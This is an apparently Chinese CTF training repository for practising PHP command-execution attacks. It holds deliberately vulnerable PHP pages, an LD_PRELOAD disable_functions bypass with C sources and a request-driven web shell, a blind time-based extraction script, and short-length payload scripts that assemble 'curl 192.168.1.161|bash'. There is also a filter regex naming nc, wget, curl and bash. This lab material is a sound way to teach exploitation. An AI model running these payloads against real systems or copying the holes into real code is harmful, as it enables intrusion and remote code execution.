├── .idea ├── .gitignore ├── modules.xml ├── php.xml ├── php_cmd.iml └── vcs.xml ├── README.md ├── index.html ├── php80 ├── .user.ini ├── class01 │ ├── exec.php │ ├── flag.php │ ├── passthru.php │ ├── pcntl.php │ ├── pig.png │ ├── popen.php │ ├── proc_open.php │ ├── quote.php │ ├── shell_exec.php │ └── system.php ├── class02 │ ├── 1.php │ ├── 2.php │ ├── POC.docx │ ├── flag.php │ └── poc.txt ├── class03 │ ├── 1.php │ ├── 2.php │ └── flag.php ├── class04 │ ├── 1.php │ └── flag.php ├── class05 │ ├── 1.php │ └── flag.php ├── class06 │ ├── 1.php │ ├── 2.php │ └── flag.php ├── class07 │ ├── 1.php │ └── flag.php ├── class08 │ ├── 1.php │ ├── flag.php │ └── poc.py ├── class09 │ ├── 1 │ │ ├── flag │ │ └── index.php │ ├── 2 │ │ ├── flag │ │ └── index.php │ ├── 3 │ │ ├── flag │ │ └── index.php │ ├── 4 │ │ ├── ffff.php │ │ └── flag │ ├── poc.rar │ └── poc │ │ ├── 4长度POC.py │ │ ├── 5长度POC.py │ │ └── 7长度POC.py ├── class10 │ ├── 1.php │ └── flag ├── class11 │ ├── 1.php │ ├── 2.php │ ├── 3.php │ ├── 4.php │ ├── flag │ ├── neg.php │ ├── plus.php │ └── xor.php ├── index.html └── info.php ├── php81 ├── .user.ini ├── class02 │ ├── 2.php │ ├── POC.docx │ ├── pcntl.php │ └── poc.txt ├── class10 │ ├── 1.php │ └── flag.php ├── index.html └── info.php └── php82 ├── class10 ├── 1.php └── flag.php ├── class11 ├── 1.php ├── 2.php ├── 3.php ├── 4.php └── flag.php ├── index.html └── info.php /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Editor-based HTTP Client requests 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/php.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | 9 | 10 | 12 | 13 | 15 | 16 | 18 | -------------------------------------------------------------------------------- /.idea/php_cmd.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # php_cmd 2 | PHP命令执行漏洞的学习靶场,CTF相关内容。可以再B站重庆橙子科技视频下学习 3 | 4 | https://space.bilibili.com/271803648 5 | 6 | 建议该靶场直接使用Docker进行部署,不然需要在PHP不同版本之间来回切换,并且需要单独安装某些php模块和系统调整,不建议将时间花费的环境搭建上。 7 | 8 | docker pull mcc0624/cmd:latest 9 | 10 | sudo docker run -p 18022:22 -p 18080:80 -p 18081:81 -p 18082:82 -p 18085:85 -i -t mcc0624/cmd:latest bash -c '/etc/rc.local; /bin/bash' 11 | 12 | php80文件夹搭建使用的是php 5.5.38版本的网站 13 | 14 | php81文件夹搭建使用的是php 7.0.33版本的网站 15 | 16 | php82文件夹搭建使用的是php 7.3.8版本的网站 17 | -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 重庆橙子科技php反序列化靶场 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 705 | 706 | 707 | 713 |
714 |
715 |

716 | 717 | 718 | 重庆橙子科技 719 | 720 |

721 | 722 | 729 | 730 | 732 |
733 |
734 |
735 | 736 |
737 |
738 |

目录

739 |
740 | 746 |
747 | 748 |
749 |
750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 760 | 761 | 762 | 763 | 764 | 765 | 766 | 767 | 768 | 769 | 770 |
771 |
772 |
773 |
774 | 0x02 无字母数字过滤 775 |
776 | 777 |
778 |
779 | 780 |
无字母数字过滤
781 |
php7.0版本绕过无字母数字过滤
782 | 783 |
784 |
785 |
786 |
787 |
788 | 789 |
790 |
791 |
792 |
793 |

794 | 代码如果有问题,请联系重庆橙子科技,短信联系:15702390228 795 |

796 | 797 |

798 | Copyright © 2014-2022 重庆橙子科技有限公司 All Rights Reserved 799 |

800 |
801 |
802 |
803 |
804 |
805 | 806 |
807 |
808 | 809 |
810 | 811 | 812 | 813 | 814 | 940 |
941 | 942 | -------------------------------------------------------------------------------- /php80/.user.ini: -------------------------------------------------------------------------------- 1 | open_basedir=/www/admin/localhost_80/wwwroot/:/tmp/:/proc/ -------------------------------------------------------------------------------- /php80/class01/exec.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php80/class01/flag.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php80/class01/pcntl.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php80/class01/pig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mcc0624/php_cmd/b09b9a3e1d3d9f985feecfd8cd4b2af10b7f84a4/php80/class01/pig.png -------------------------------------------------------------------------------- /php80/class01/popen.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php80/class01/proc_open.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php80/class01/quote.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php80/class01/shell_exec.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php80/class01/system.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php80/class02/1.php: -------------------------------------------------------------------------------- 1 | 16 | -------------------------------------------------------------------------------- /php80/class02/POC.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mcc0624/php_cmd/b09b9a3e1d3d9f985feecfd8cd4b2af10b7f84a4/php80/class02/POC.docx -------------------------------------------------------------------------------- /php80/class02/flag.php: -------------------------------------------------------------------------------- 1 | 5 | #include 6 | #include 7 | 8 | void payload(){ 9 | system("ls /var/www/html > /tmp/benben"); 10 | } 11 | int geteuid() 12 | { 13 | if(getenv("LD_PRELOAD") == NULL){ return 0; } 14 | unsetenv("LD_PRELOAD"); 15 | payload(); 16 | } 17 | 18 | 19 | 2、生成.so文件hack1.so 20 | gcc -c -fPIC hack1.c -o hack1 21 | gcc --share hack1 -o hack1.so 22 | 23 | 24 | 3、通过putenv设置LD_PRELOAD,让hack1.so优先被调用。并通过mail函数发送一封邮件来触发。 25 | 29 | 30 | 31 | 方式二: 32 | 33 | (1)hack2.c 34 | #include 35 | #include 36 | #include 37 | 38 | int geteuid() 39 | { 40 | const char* cmdline = getenv("EVIL_CMDLINE"); //获得系统的环境变量EVIL_CMDLINE 41 | if(getenv("LD_PRELOAD") == NULL){ return 0; } 42 | unsetenv("LD_PRELOAD"); //删除系统变量 43 | system(cmdline); 44 | } 45 | (2)将c文件编译成动态链接库: 46 | gcc -shared -fPIC hack2.c -o hack2.so 47 | 48 | 49 | (3)qwzf2.php 50 | 51 | ".$out_path." 2>&1"; 55 | echo "
cmdline: ".$evil_cmdline; 56 | putenv("EVIL_CMDLINE=".$evil_cmdline); 57 | 58 | $so_path = $_REQUEST["sopath"]; 59 | putenv("LD_PRELOAD=".$so_path); 60 | mail("", "", "", ""); 61 | 62 | echo "
output:
".nl2br(file_get_contents($out_path)) 63 | ?> 64 | 65 | 66 | (4)将hack2.so文件和qwzf2.php文件,通过代码执行写入(或使用蚁剑直接上传)具有写入权限的目录。 67 | 然后在浏览器上测试: 68 | 69 | http://x.x.x.165:8001/?code=include('/tmp/qwzf2.php'); 70 | post: cmd=ls&outpath=/tmp/test&sopath=/tmp/hack2.so 71 | 72 | 73 | -------------------------------------------------------------------------------- /php80/class03/1.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php80/class03/2.php: -------------------------------------------------------------------------------- 1 | /dev/null 2>&1"; 6 | if(isset($cmd)){ 7 | system($cmd); 8 | } 9 | ?> -------------------------------------------------------------------------------- /php80/class03/flag.php: -------------------------------------------------------------------------------- 1 | "; 9 | echo "命令执行结果如下:"; 10 | system($cmd); 11 | } 12 | ?> 13 | 14 | -------------------------------------------------------------------------------- /php80/class04/flag.php: -------------------------------------------------------------------------------- 1 | |\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|python|pingtouch|mv|mkdir|cp/i', $x)){ 5 | die('too young too simple sometimes naive!'); 6 | } 7 | } 8 | if(isset($_GET['cmd'])){ 9 | $cmd=$_GET['cmd']; 10 | check($cmd); 11 | exec($cmd); 12 | } 13 | else{ 14 | highlight_file(__FILE__); 15 | } 16 | ?> -------------------------------------------------------------------------------- /php80/class08/flag.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /php80/class08/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import time 3 | url = "http://192.168.1.6:19080/class08/1.php" 4 | result = "" 5 | for i in range(1,5): 6 | for j in range(1,55): 7 | #ascii码表 8 | for k in range(32,128): 9 | k=chr(k) 10 | #time.sleep(0.1) 11 | payload = "?cmd=" + f"if [ `cat flag.php | awk NR=={i} | cut -c {j}` == {k} ];then sleep 2;fi" 12 | try: 13 | requests.get(url=url+payload, timeout=(1.5,1.5)) 14 | except: 15 | result = result + k 16 | print(result) 17 | break 18 | result += " " 19 | -------------------------------------------------------------------------------- /php80/class09/1/flag: -------------------------------------------------------------------------------- 1 | 4 | -------------------------------------------------------------------------------- /php80/class09/2/index.php: -------------------------------------------------------------------------------- 1 | g\;", 10 | ">g\>", 11 | ">ht-", 12 | ">sl", 13 | ">dir", 14 | "*>v", 15 | ">rev", 16 | "*v>x" 17 | ] 18 | 19 | # curl 192.168.1.161|bash 20 | list2= [ 21 | ">ash", 22 | ">b\\", 23 | '>\|\\', 24 | '>A1\\', 25 | '>01\\', 26 | '>A8\\', 27 | '>C0\\', 28 | '>0x\\', 29 | '>\ \\', 30 | '>rl\\', 31 | '>cu\\' 32 | ] 33 | for i in list: 34 | time.sleep(1) 35 | url = baseurl+str(i) 36 | s.get(url) 37 | 38 | for j in list2: 39 | time.sleep(1) 40 | url = baseurl+str(j) 41 | s.get(url) 42 | 43 | s.get(baseurl+"sh x") 44 | s.get(baseurl+"sh g") 45 | -------------------------------------------------------------------------------- /php80/class09/poc/5长度POC.py: -------------------------------------------------------------------------------- 1 | #encoding:utf-8 2 | import time 3 | import requests 4 | baseurl = "http://192.168.1.6:19080/class09/3/index.php?cmd=" 5 | s = requests.session() 6 | 7 | # 将ls -t 写入文件_ 8 | list=[ 9 | ">ls\\", 10 | "ls>_", 11 | ">\ \\", 12 | ">-t\\", 13 | ">\>y", 14 | "ls>>_" 15 | ] 16 | 17 | # curl 192.168.1.161/1|bash 18 | list2=[ 19 | ">bash", 20 | ">\|\\", 21 | ">\/\\", 22 | ">61\\", 23 | ">1\\", 24 | ">1.\\", 25 | ">8.\\", 26 | ">16\\", 27 | ">2.\\", 28 | ">19\\", 29 | ">\ \\", 30 | ">rl\\", 31 | ">cu\\" 32 | ] 33 | for i in list: 34 | time.sleep(1) 35 | url = baseurl+str(i) 36 | s.get(url) 37 | 38 | for j in list2: 39 | time.sleep(1) 40 | url = baseurl+str(j) 41 | s.get(url) 42 | 43 | s.get(baseurl+"sh _") 44 | s.get(baseurl+"sh y") 45 | 46 | -------------------------------------------------------------------------------- /php80/class09/poc/7长度POC.py: -------------------------------------------------------------------------------- 1 | #encoding:utf-8 2 | import time 3 | import requests 4 | baseurl = "http://192.168.1.6:19080/class09/2/index.php?cmd=" 5 | s = requests.session() 6 | 7 | list=[ 8 | '>7777', 9 | '>1\%20\\', 10 | '>16\\', 11 | '>1.\\', 12 | '>168.\\', 13 | '>2.\\', 14 | '>19\\', 15 | '>c\%20\\', 16 | '>\|n\\', 17 | '>ag\\', 18 | '>fl\\', 19 | '>t\ \\', 20 | '>ca\\', 21 | 'ls -t>a' 22 | ] 23 | 24 | for i in list: 25 | time.sleep(1) 26 | url = baseurl+str(i) 27 | s.get(url) 28 | 29 | s.get(baseurl+"sh a") 30 | -------------------------------------------------------------------------------- /php80/class10/1.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php80/class10/flag: -------------------------------------------------------------------------------- 1 | 5){ 5 | die("Too Long!"); 6 | } 7 | if(preg_match("/[A-Za-z0-9]+/",$command)){ 8 | die("No letters or numbers!"); 9 | } 10 | eval(system("echo you are not able to get flag;$command 2>&1")); 11 | }else{ 12 | highlight_file(__FILE__); 13 | } 14 | ?> -------------------------------------------------------------------------------- /php80/class11/3.php: -------------------------------------------------------------------------------- 1 | "; 74 | echo "字符串:".$result; 75 | echo "
"; 76 | echo "URL编码:".$result1; 77 | 78 | -------------------------------------------------------------------------------- /php80/class11/plus.php: -------------------------------------------------------------------------------- 1 | "; 42 | echo "异或运算第二部分: ".$result2; 43 | -------------------------------------------------------------------------------- /php80/info.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /php81/.user.ini: -------------------------------------------------------------------------------- 1 | open_basedir=/www/admin/localhost_81/wwwroot/:/tmp/:/proc/ -------------------------------------------------------------------------------- /php81/class02/2.php: -------------------------------------------------------------------------------- 1 | 15 | 16 | 29 | -------------------------------------------------------------------------------- /php81/class02/POC.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mcc0624/php_cmd/b09b9a3e1d3d9f985feecfd8cd4b2af10b7f84a4/php81/class02/POC.docx -------------------------------------------------------------------------------- /php81/class02/pcntl.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php81/class02/poc.txt: -------------------------------------------------------------------------------- 1 | 2 | 方式一: 3 | 1、hack1.c 4 | #include 5 | #include 6 | #include 7 | 8 | void payload(){ 9 | system("ls /var/www/html > /tmp/benben"); 10 | } 11 | int geteuid() 12 | { 13 | if(getenv("LD_PRELOAD") == NULL){ return 0; } 14 | unsetenv("LD_PRELOAD"); 15 | payload(); 16 | } 17 | 18 | 19 | 2、生成.so文件hack1.so 20 | gcc -c -fPIC hack1.c -o hack1 21 | gcc --share hack1 -o hack1.so 22 | 23 | 24 | 3、通过putenv设置LD_PRELOAD,让hack1.so优先被调用。并通过mail函数发送一封邮件来触发。 25 | 29 | 30 | 31 | 方式二: 32 | 33 | (1)hack2.c 34 | #include 35 | #include 36 | #include 37 | 38 | int geteuid() 39 | { 40 | const char* cmdline = getenv("EVIL_CMDLINE"); //获得系统的环境变量EVIL_CMDLINE 41 | if(getenv("LD_PRELOAD") == NULL){ return 0; } 42 | unsetenv("LD_PRELOAD"); //删除系统变量 43 | system(cmdline); 44 | } 45 | (2)将c文件编译成动态链接库: 46 | gcc -shared -fPIC hack2.c -o hack2.so 47 | 48 | 49 | (3)qwzf2.php 50 | 51 | ".$out_path." 2>&1"; 55 | echo "
cmdline: ".$evil_cmdline; 56 | putenv("EVIL_CMDLINE=".$evil_cmdline); 57 | 58 | $so_path = $_REQUEST["sopath"]; 59 | putenv("LD_PRELOAD=".$so_path); 60 | mail("", "", "", ""); 61 | 62 | echo "
output:
".nl2br(file_get_contents($out_path)) 63 | ?> 64 | 65 | 66 | (4)将hack2.so文件和qwzf2.php文件,通过代码执行写入(或使用蚁剑直接上传)具有写入权限的目录。 67 | 然后在浏览器上测试: 68 | 69 | http://x.x.x.165:8001/?code=include('/tmp/qwzf2.php'); 70 | post: cmd=ls&outpath=/tmp/test&sopath=/tmp/hack2.so 71 | 72 | 73 | -------------------------------------------------------------------------------- /php81/class10/1.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 重庆橙子科技php7.0 mail过滤 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 705 | 706 | 707 | 713 |
714 |
715 |

716 | 717 | 718 | 重庆橙子科技 719 | 720 |

721 | 722 | 729 | 730 | 732 |
733 |
734 |
735 | 736 |
737 |
738 |

目录

739 |
740 | 746 |
747 | 748 |
749 |
750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 760 | 761 | 762 | 763 | 764 | 765 | 766 | 767 | 768 | 769 | 770 |
771 |
772 |
773 |
774 | 0x02 过滤命令执行函数 775 |
776 | 777 |
778 |
779 | 780 |
info信息
781 |
仅仅过滤常见函数的一个多多个,使用替换其他函数执行命令
782 | 783 |
784 |
785 | 786 |
禁用函数例题
787 |
仅仅过滤常见函数的一个多多个,使用替换其他函数执行命令
788 | 789 |
790 |
791 | 792 |
POC代码下载
793 |
课程中所用到的poc代码
794 | 795 |
796 |
797 |
798 |
799 |
800 | 801 |
802 |
803 |
804 |
805 |

806 | 代码如果有问题,请联系重庆橙子科技,请在B站给留言,或短信联系:15702390228 807 |

808 | 809 |

810 | Copyright © 2014-2023 重庆橙子科技有限公司 All Rights Reserved 811 |

812 |
813 |
814 |
815 |
816 |
817 | 818 |
819 |
820 | 821 |
822 | 823 | 824 | 825 | 826 | 952 |
953 | 954 | -------------------------------------------------------------------------------- /php81/info.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /php82/class10/1.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php82/class10/flag.php: -------------------------------------------------------------------------------- 1 | 2 | --------------------------------------------------------------------------------